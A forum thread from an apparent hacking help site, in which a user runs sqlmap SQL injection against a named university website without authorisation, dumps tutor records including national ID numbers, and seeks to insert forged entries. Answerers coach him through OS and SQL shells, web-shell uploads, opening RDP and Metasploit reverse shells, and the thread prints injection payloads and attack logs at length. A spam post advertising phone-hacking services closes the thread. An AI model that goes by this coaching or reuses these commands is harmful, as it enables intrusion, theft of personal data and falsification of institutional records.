menu search
brightness_auto
more_vert

I found some databases on a website which is under as:

web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
available databases [17]:
[*] Admission
[*] LIVE_AIOU
[*] master
[*] model
[*] msdb
[*] OBJ
[*] Online-Admission
[*] Pictures
[*] Queries
[*] ReportServer
[*] ReportServerTempDB
[*] Rollnoslips
[*] STATS
[*] tempdb
[*] Tutor_List
[*] Tutors
[*] UMC

Now i would like to know which database is connected to the webpage (www.aiou.edu.pk/Tutorship.asp).

and how i will hack or edit the database, if i want to add a user in database.

related to an answer for: How to hack DBMS Sql server 2008?
closed with the note: answer selected
thumb_up_off_alt 0 like thumb_down_off_alt 0 dislike
more_vert

.:: Educational Purpose Only ::.

what is sqlmap?

Sqlmap is one of the most popular and powerful sql injection automation tool out there. Given a vulnerable http request url, sqlmap can exploit the remote database and do a lot of hacking like extracting database names, tables, columns, all the data in the tables etc. It can even read and write files on the remote file system under certain conditions. Written in python it is one of the most powerful hacking tools out there. Sqlmap is the metasploit of sql injections.

Vulnerable Url:

http://www.site.com/section.php?id=51
and it is prone to sql injection because the developer of that site did not properly escape the parameter id. This can be simply tested by trying to open the url
http://www.site.com/section.php?id=51'
Hacking with sqlmap
in console try this
sqlmap -u http://site.com/index.asp?id=765

Discover Databases

Once sqlmap confirms that a remote url is vulnerable to sql injection and is exploitable the next step is to find out the names of the databases that exist on the remote system. The "--dbs" option is used to get the database list.

$ sqlmap  -u "http://www.sitemap.com/section.php?id=51" --dbs

and the result should be 

[12:13:00] [INFO] fetching database names
[12:13:00] [INFO] the SQL query used returns 2 entries
[12:13:00] [INFO] resumed: information_schema
[12:13:00] [INFO] resumed: mywebdb
available databases [2]:
[*] information_schema
[*] mywebdb

Find tables in a particular database

Now its time to find out what tables exist in a particular database. Lets say the database of interest over here is 'mywebdb

sqlmap -u "http://www.site.com/section.php?id=51" --tables -D mywebdb
and the output can be something similar to this
back-end DBMS: MySQL 5
[11:55:18] [INFO] fetching tables for database: 'safecosmetics'
[11:55:19] [INFO] heuristics detected web page charset 'ascii'
[11:55:19] [INFO] the SQL query used returns 216 entries
[11:55:20] [INFO] retrieved: acl_acl
[11:55:21] [INFO] retrieved: acl_acl_sections                                                                                
........... more tables

Get columns of a table

Now that we have the list of tables with us, it would be a good idea to get the columns of some important table. Lets say the table is 'users' and it contains the username and password.

sqlmap  -u "http://www.site.com/section.php?id=51" --columns -D mywebdb -T users

The output can be something like this

[12:17:39] [INFO] fetching columns for table 'users' in database 'safecosmetics'
[12:17:41] [INFO] heuristics detected web page charset 'ascii'
[12:17:41] [INFO] the SQL query used returns 8 entries
[12:17:42] [INFO] retrieved: id
[12:17:43] [INFO] retrieved: int(11)                                                                                         
[12:17:45] [INFO] retrieved: name                                                                                            
[12:17:46] [INFO] retrieved: text                                                                                            
[12:17:47] [INFO] retrieved: password                                                                                        
[12:17:48] [INFO] retrieved: text                                                                                            

.......

[12:17:59] [INFO] retrieved: hash
[12:18:01] [INFO] retrieved: varchar(128)
Database: safecosmetics
Table: users
[8 columns]
+-------------------+--------------+
| Column            | Type         |
+-------------------+--------------+
| email             | text         |
| hash              | varchar(128) |
| id                | int(11)      |
| name              | text         |
| password          | text         |
| permission        | tinyint(4)   |
| system_allow_only | text         |
| system_home       | text         |
+-------------------+--------------+
So now the columns are clearly visible. Good job!

Get data from a table

Now comes the most interesting part, of extracting the data from the table. The command would be

sqlmap -u "http://www.site.com/section.php?id=51" --dump -D mywebdb -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The output might look similar to this
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| id | hash               | name      | email     | password | permission | system_home | system_allow_only |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
| 1  | 5DIpzzDHFOwnCvPonu | admin     | <blank>   | <blank>  | 3          | <blank>     | <blank>           |
+----+--------------------+-----------+-----------+----------+------------+-------------+-------------------+
ok we did it,
now you are asking how you will get the exact vuln "id=" yea  scan that site in some automated scanner if they detected a sql injection error then you will get a vulnerable link try on that i hope its might enough.

1 Answer

more_vert
 
done_all
Best answer

that query has already been answered by  --current-db switch in sqlmap or select db_name() query.

How to Hack a server through its DB a.k.a pwnage 

well , first of all edit your question and hide the website address as we do not promote unauthorized hacking (its baaad) 

as you shared a windows server , although you did not share the connected user but I assume its a SYSTEM account which means that it has admin rights on the server , so there is nothing hard now , is it ? 

just use --os-shell switch in sqlmap to get your self a command console , from there you can add a new user with admin rights , check if RDP is open .. if not open that or even spawn a PowerShell (refer to my powershell archive hacks and techniques ) 

–os-shell: SQLMap will try to get the operating system command shell by exploiting SQL injection

with the above you can wreak havoc

Play Safe

thumb_up_off_alt 0 like thumb_down_off_alt 0 dislike
more_vert
Enumerate DB Tutors and see the columns , it will show you same columns as they are on the link you shared , that means the same db is connecting with that page ...

its fairly simple to understand that
more_vert
by using the commands i got the column names and table names along with databases names but here is the problem to recognize the appropriate database for the said page, which database is connected to that page? how i will find out the specif database for specific webpage??
more_vert
in the 17 databases which one is the correct database for that page, i checked the tutors and tutor_list database and its table but i could not find any ID or Password colmun table to edit their values. or put upload my own data in that database.
more_vert
In the same database how i will add my own information to retrive on the said page.
more_vert

its not compulsory that every data base will have a Username and Password .moreover let suppose you find one , did you find a Login page on the website ? from where you can get access ? 
You should follow this SQLi Tutorial in one of our Archives and if you can find RDP this guide to Open RDP through CLI might help you aswell

did you try the os shell switches i mentioned above ? 

One More thing the ID and password stored INSIDE a database are the login information for the web based site , the database editing does not require that information .. enumerate which user you are able to access all the databases ? what rights you have ? 

more_vert
It shows only 98 records during scan search, however it has 5000 record, in the end it shows the following error.

[21:23:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 394 times
more_vert
I used the following command

sqlmap -u www.website.com/page.asp?REG_NO= -D Tutors -T TUTORD_TUTOR_WEB1 -C FNAME,REGION,NIC_NO --dump

In result it shows only 98 records instead of 5000 records and in the end line it says

[21:23:42] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 394 times

What is the matter?????
more_vert

(Read the Bold values, that are my elements)

My Database is 

[*] Tutors

and

[10 tables]
+-------------------+
| COURSE_03_12_15   |
| COURSE_03_12_15   |
| COURSE_12_11_13   |
| DISTRICT          |
| TUTORD_TUTOR_WEB1 |
| TUTORD_TUTOR_WEB1 |
| TUTOR_03_12_15    |
| TUTOR_03_12_15    |
| TUTOR_12_11_13    |

| dtproperties      |
+-------------------+

and

[18 columns]
+---------------+----------+
| Column        | Type     |
+---------------+----------+
| ADDRESS       | nvarchar |
| BATCH_NO      | float    |
| COURSE        | nvarchar |
| DESIGNATION   | nvarchar |
| DISTRICT      | nvarchar |
| FNAME         | nvarchar |
| FORM_NO       | float    |
| GENDER        | nvarchar |
| NAME          | nvarchar |
| NIC_NO        | nvarchar |
| ODISTRICT     | nvarchar |
| OFFICIAL_ADD1 | nvarchar |
| OTEHSIL       | nvarchar |
| PHONE         | nvarchar |
| QUALIFICATION | nvarchar |
| REG_NO        | nvarchar |
| REGION        | nvarchar |
| TEHSIL        | nvarchar |
+---------------+----------+

NOW

this is the data which i received from the database and also available on the said web page.

| ABDUL ALI                   | MUHAMAMD ALI               | PESHAWAR       | 10-PLR-T0261 |
| ABDUL ALI KHAN              | MUSHTAQ ALI KHAN           | SAIDU SHARIF   | 12-NMD-T0035 |
| ABDUL ALIM                  | UMAR DIN                   | KARACHI        | 06-SKI-T0035 |
| ABDUL AMIN                  | ABDUL MAJEED               | SAIDU SHARIF   | 07-NBR-T0003 |
| ABDUL ANIS KHAN             | ABDUL RAHIM KHAN           | KARACHI        | 02-SKI-T0037 |
| ABDUL ATIQUE                | ABDUL REHMAN               | D.G.KHAN       | 12-PMH-T0328 |
+-----------------------------+----------------------------+----------------+--------------+

and so on

Finally i got the right place right database for the right web page.

Now we have 04 Databases for (http://www.aiou.edu.pk/Tutorship.asp) web page which has all its given information.

04 databases are working under this web page

(http://www.aiou.edu.pk/Tutorship.asp)

+---------------+----------+
| Column        | Type     |
+---------------+----------+
| FNAME         | nvarchar |
| NAME          | nvarchar |
| REG_NO        | nvarchar |
| REGION        | nvarchar |
+---------------+----------+

Check the details

http://www.aiou.edu.pk/TutorDetail.asp?REG_NO=12-PMH-T0328

the result of the said link is available on the web page. I just paste here to show you .

now check this

http://www.aiou.edu.pk/TutorDetail.asp?REG_NO=

here is empty place

i told you what i have, NOW WHAT I WANT.

I want upload my own information like name,fname,etc etc on that page with a unique no. i.e 00-PCP-T1234.

When someone visit http://www.aiou.edu.pk/TutorDetail.asp?REG_NO=00-PCP-T1234. Then my given data should show. Now i need gain access to reach those database to add my information in their databases. That's It.

more_vert

unique number is your REG_NO ..anyway you need to pawn a shell with this syntax :

sqlmap -u TARGET -D DBNAME --sql-shell

read the help against the switch --sql-shell ... and you didn't share your feedback after --os-shell ?

you can even run –os-cmd=OSCMD switch to get System level cmds , that way why don't you just turn on RDP and get a GUI access .. the options are endless.

The only reason you are not being able to grasp this is because you just want to achieve something sinister and your aim is NOT to learn or anything .. anyway I told you everything there is to it..

more_vert
Dear Sir my AIM and purpose is not to harm or damage my aim is only to learn thats it sir. I used all of commands as you gave me

1. --os-shell
2. --os-cmd=PSCMD

3. sqlmap -u TARGET -D DBNAME --sql-shell

I found different results of all .

[*] starting at 02:45:17

[02:45:17] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:45:17] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:45:17] [INFO] testing connection to the target URL

Q. Why it says REG_NO is empty?? and use valid parameter values.???

=============================================================
Command No.1 and its result is as under:

root@kali:~# sqlmap -u Target -D DB --os-shell
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.6.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:41:27

[02:41:27] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:41:27] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:41:31] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: REG_NO (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REG_NO=10-KGT-T0010' AND 6179=6179 AND 'qLTs'='qLTs

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: REG_NO=10-KGT-T0010';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: REG_NO=10-KGT-T0010' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: REG_NO=-1385' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(83)+CHAR(108)+CHAR(75)+CHAR(66)+CHAR(118)+CHAR(115)+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(102)+CHAR(87)+CHAR(90)+CHAR(105)+CHAR(89)+CHAR(111)+CHAR(71)+CHAR(116)+CHAR(121)+CHAR(76)+CHAR(113)+CHAR(86)+CHAR(68)+CHAR(81)+CHAR(79)+CHAR(97)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(113)+CHAR(84)+CHAR(118)+CHAR(76)+CHAR(77)+CHAR(105)+CHAR(70)+CHAR(79)+CHAR(66)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL-- ApLS
---
[02:41:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[02:41:32] [INFO] testing if current user is DBA
[02:41:33] [INFO] testing if xp_cmdshell extended procedure is usable
[02:41:34] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:41:41] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[02:41:59] [ERROR] unable to retrieve xp_cmdshell output
[02:41:59] [INFO] going to use xp_cmdshell extended procedure for operating system command execution
[02:41:59] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER
os-shell>




Now what should i do next when i am in os-shell>


====================================================================

Command No.2 and its result is as under

root@kali:~# sqlmap -u www.aiou.edu.pk/TutorDetail.asp?REG_NO= -D Tutors --os-cmd=OSCMD
        ___
       __H__
 ___ ___[)]_____ ___ ___  {1.1.6.4#dev}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:53:20

[02:53:21] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:53:21] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:53:25] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: REG_NO (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REG_NO=10-KGT-T0010' AND 6179=6179 AND 'qLTs'='qLTs

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: REG_NO=10-KGT-T0010';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: REG_NO=10-KGT-T0010' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: REG_NO=-1385' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(83)+CHAR(108)+CHAR(75)+CHAR(66)+CHAR(118)+CHAR(115)+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(102)+CHAR(87)+CHAR(90)+CHAR(105)+CHAR(89)+CHAR(111)+CHAR(71)+CHAR(116)+CHAR(121)+CHAR(76)+CHAR(113)+CHAR(86)+CHAR(68)+CHAR(81)+CHAR(79)+CHAR(97)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(113)+CHAR(84)+CHAR(118)+CHAR(76)+CHAR(77)+CHAR(105)+CHAR(70)+CHAR(79)+CHAR(66)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL-- ApLS
---
[02:53:25] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[02:53:25] [INFO] testing if current user is DBA
[02:53:26] [INFO] testing if xp_cmdshell extended procedure is usable
[02:53:27] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:53:33] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[02:53:51] [ERROR] unable to retrieve xp_cmdshell output
do you want to retrieve the command standard output? [Y/n/a] Y
[02:53:54] [INFO] retrieved:
[02:53:55] [INFO] retrieved:
[02:54:01] [INFO] adjusting time delay to 2 seconds due to good response times
0
No output
[02:54:04] [INFO] cleaning up the database management system
do you want to remove UDF 'master..new_xp_cmdshell'? [Y/n] Y
[02:54:07] [INFO] database management system cleanup finished
[02:54:07] [WARNING] remember that UDF dynamic-link library files saved on the file system can only be deleted manually
[02:54:07] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1 times
[02:54:07] [INFO] fetched data logged to text files under '/root/.sqlmap/output/www.aiou.edu.pk'

[*] shutting down at 02:54:07

root@kali:~#

=============================================================================
Command No.3 and its result as  under.


root@kali:~# sqlmap -u www.aiou.edu.pk/TutorDetail.asp?REG_NO= -D Tutors --sql-shell
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.1.6.4#dev}
|_ -| . [.]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 02:30:22

[02:30:22] [WARNING] provided value for parameter 'REG_NO' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[02:30:22] [INFO] resuming back-end DBMS 'microsoft sql server'
[02:30:40] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: REG_NO (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: REG_NO=10-KGT-T0010' AND 6179=6179 AND 'qLTs'='qLTs

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: REG_NO=10-KGT-T0010';WAITFOR DELAY '0:0:5'--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (IF - comment)
    Payload: REG_NO=10-KGT-T0010' WAITFOR DELAY '0:0:5'--

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: REG_NO=-1385' UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(122)+CHAR(118)+CHAR(83)+CHAR(108)+CHAR(75)+CHAR(66)+CHAR(118)+CHAR(115)+CHAR(74)+CHAR(118)+CHAR(73)+CHAR(102)+CHAR(87)+CHAR(90)+CHAR(105)+CHAR(89)+CHAR(111)+CHAR(71)+CHAR(116)+CHAR(121)+CHAR(76)+CHAR(113)+CHAR(86)+CHAR(68)+CHAR(81)+CHAR(79)+CHAR(97)+CHAR(68)+CHAR(85)+CHAR(97)+CHAR(113)+CHAR(84)+CHAR(118)+CHAR(76)+CHAR(77)+CHAR(105)+CHAR(70)+CHAR(79)+CHAR(66)+CHAR(102)+CHAR(113)+CHAR(118)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL-- ApLS
---
[02:30:48] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
[02:30:48] [INFO] calling Microsoft SQL Server shell. To quit type 'x' or 'q' and press ENTER
sql-shell>


NOW WHAT TO DO NEXT now i am in sql-shell> and os-shell>
more_vert
In Addition i found more i am going to show you and its result.

--os-pwn
and
 --os-smbrelay   

i found the following result when i applied these commands result are as under:

====================================================
--os-pwn    i choose

[1] TCP: Metasploit Framework (default)
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y

i choose Y

then it shows the following.

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> Y
[04:17:14] [WARNING] invalid value, only digits are allowed
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection


I choose 1 because it is default
[1] Reverse TCP: Connect back from the database host to this machine (default)

then i choose type my local ip
what is the local address? [Enter for '192.168.180.128' (detected)] 192.168.180.128

then
port 64899

then i use payload as default (meterpreter)
[1] Meterpreter (default)

then

> 1
[04:19:30] [INFO] creation in progress ................................ done
[04:20:02] [INFO] uploading shellcodeexec to 'C:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpseyvfy.exe'
[04:20:02] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpseyvfy.exe'
[04:20:02] [CRITICAL] page not found (404)
[04:20:02] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

NOW WHAT?

 in next post i show you the  --os-smbrelay   

but first help me in --os-pwn and its options
more_vert
check the following i use VNC



===============================

[04:23:07] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[04:23:08] [INFO] testing if current user is DBA
[04:23:11] [INFO] testing if xp_cmdshell extended procedure is usable
[04:23:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:23:51] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[04:23:51] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
[04:23:56] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[04:23:57] [ERROR] unable to retrieve xp_cmdshell output
[04:23:57] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.180.128' (detected)] 192.168.180.128
which local port number do you want to use? [15786] 15786
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 3
[04:24:59] [WARNING] it is unlikely that the VNC injection will be successful because usually Microsoft SQL Server 2008 runs as Network Service or the Administrator is not logged in
what do you want to do?
[1] Give it a try anyway
[2] Fall back to Meterpreter payload (default)
[3] Fall back to Shell payload
> 2
[04:25:19] [INFO] creation in progress ........ done
[04:25:27] [INFO] uploading shellcodeexec to 'C:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpseapdm.exe'
[04:25:27] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpseapdm.exe'
[04:25:28] [CRITICAL] page not found (404)
[04:25:28] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
more_vert
check it out also sir

[04:27:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 8 or 2012
web application technology: ASP.NET, ASP, Microsoft IIS 8.0
back-end DBMS: Microsoft SQL Server 2008
how do you want to establish the tunnel?
[1] TCP: Metasploit Framework (default)
[2] ICMP: icmpsh - ICMP tunneling
> 1
[04:27:57] [INFO] testing if current user is DBA
[04:27:58] [INFO] testing if xp_cmdshell extended procedure is usable
[04:27:59] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[04:28:08] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] Y
[04:28:24] [ERROR] unable to retrieve xp_cmdshell output
[04:28:24] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection
> 1
what is the local address? [Enter for '192.168.180.128' (detected)] 192.168.180.128
which local port number do you want to use? [51549] 51549
which payload do you want to use?
[1] Meterpreter (default)
[2] Shell
[3] VNC
> 2
[04:28:43] [INFO] creation in progress ....... done
[04:28:50] [INFO] uploading shellcodeexec to 'C:/Program Files/Microsoft SQL Server/MSSQL10_50.MSSQLSERVER/MSSQL/Log/tmpseiwuv.exe'
[04:28:50] [INFO] using PowerShell to write the binary file content to file 'C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Log\tmpseiwuv.exe'
[04:28:53] [CRITICAL] page not found (404)
[04:28:53] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times

[*] shutting down at 04:28:53


it says shell cannot upload.
what should i do now?
more_vert
the following commands options i applied but wont work why

which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535
[3] Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP
[4] Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS
[5] Bind TCP: Listen on the database host for a connection

AND

[1] Meterpreter (default)
[2] Shell
[3] VNC
more_vert

well you said you want to 

Q. Why it says REG_NO is empty?? and use valid parameter values.???

because REG_NO=<Parameter>  , its basic you need to give it a parameter so it can inject

Now what should i do next when i am in os-shell>
try entering a windows command to see if it is responding , it can be anything at times (some useful commands ) you do not get a reply inside the cli , what you can do is you can listen on a port on your machine and inside os shell you can ping your ip and port , if you get a ping it means your commands are being run successfully. Let me explain .. OS SHELL means you have a terminal access to the machine , if you have an system access that means that you are having admin rights on the machine and you can literally do anything on the remote machine using your admin rights.

NOW WHAT TO DO NEXT now i am in sql-shell> and os-shell>

SQL Shell means you can run all SQL COMMANDS and  again as its a windows server you can use  xp_cmdshell - to execute windows commands from within sql shell... 

Metasploit Framework --os-pwn

For MSF commands you will need to read what it says and in these you need to setup port forwarding and set the same port so that reverse connections come to your machine .. (Port Forwarding) 

 

more_vert
which are the sql usefull commands i am trying to type the commands hostname etc but it wont work it says NO OUTPUT. what should i do next? i am in os-shell> and sqlshell mode.
more_vert
i did correct my parameter its now fine, but what is next step?
more_vert
i found some user db username with password with hash: long charachter/digit  numbers.

How to convert hash into password?
more_vert
sqlmap showed me alot of information ID DB USER Pass but how to connect or login there? and password is showing in long digit charachter like it says HASH: how to encryp/decryp? the below commands are very useful sir.

--current-user     
    --current-db    
    --passwords   
    --tables           
    --columns       
    --schema        
    --dump           

how to login into database? what to do next sir? and another thing how to find the admin page for editing or edit database?
more_vert
how to ping my port and how to open RDP?
more_vert
My question is still stand and not yet satisfactory answer sir.
more_vert
  • I told you about hash Encryption and decryption 
  • The login INFO you see in db is used to login to the web based login panel (if any,which usually is ). you login into a db using a DBMS. Admin Page on a site you can find with various already placed scripts in Information Gathering ,Profiling in Kali OS 
  • "How to Ping my Port" , "How to Open RDP" if you could only google the same lines, anyway what I said above was that you need to open RDP .. I am giving you guidance and telling you what you might need to do to achieve what you are trying to do 
more_vert
i hope you are not going to damage the web database you can directly upload web access shell through sqlmap if you have DBA,

DBA means he has admin/write privileges
./sqlmap.py -u http://site.com/file.php?id=1,2,3 --current-user --is-dba
and it gives you current user is DBA 'True'

then you can upload web access shell through sqlmap.

and your answers are here

hash mostly used in sql errors are md5, sha and ntlm

if you have dabatase login & pass then you have to find admin panel for the site eg: admin, administrator etc etc,

if you want to open RDP it stands for remote desktop protocol if you go to search in your OS type there Remote Desktop protocol first I.P of server then login infos,
more_vert
no file such directory found.
more_vert

no file directory found

./sqlmap.py -u http://site.com/file.php?id=1

more_vert
i give you just an example dear like http://site.com << Your target site /file.php << vulnerable location ?id=1 << vulnerable number

now let me explain it to you

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 thats all vulnerable path and now comes --current-user it means that current aid --is-dba in full you have to use it like this

./sqlmap.py -u www.drhack.net/contactus.asp?aid=120 --current-user --is-dba

if it gives current user is DBA true than you can upload web shell on that server or site

but you have to put correct path which is vulnerable to sqlerror if its not vulnerable then you can't do anything dear.
more_vert
When i type ./sqlmap.py ........ It says no file directory found, it seems that ./sqlmap.py is not installed ??
more_vert
How i will come to know that which page.asp is linked connected with which database ? i want to add some data details in a site.com/page.asp?id=555
So what i will do first to login in the database ? Which thing will allow me to login into database and where i can add my own data in a specify id to edit or add.
more_vert
when you type ./sqlmap.py it says no file ok,

go for => sqlmap -u http://site.com/page.asp?aid=434 --dbs << try this if it worked then try for --current-user --is-dba
if you want to know which page.asp is linked connected with database then scan full site or server on your b0x now lemme explain you full tut
more_vert
Can you give me your e.mail id where i can send you all output data/details.
more_vert
Hi here...i'm Barry, i'm here to thank Birdeye (thats what he calls himself lol) for saving me from the most dangerous woman you can ever meet in several lifetimes. I was suspicious she was trying to kill me because of some insurance money, i was able to contact Birdeye to give me access to her phone so i could get her conversations with the men she was hiring. I also got to find out she was also cheating on me with a friend of mine. All thanks to [-SPAM-BOT-REDACTED] for saving my life. Contact him today, he's the best among all others. You can use me as your reference,,
Welcome to Ask Techie
Ask questions and receive answers from other members of the community. Hacking, Technology, Gaming, Programming, Blockchain and everything to get you going with your Cyber World.

222 questions

227 answers

401 comments

726,223 users

...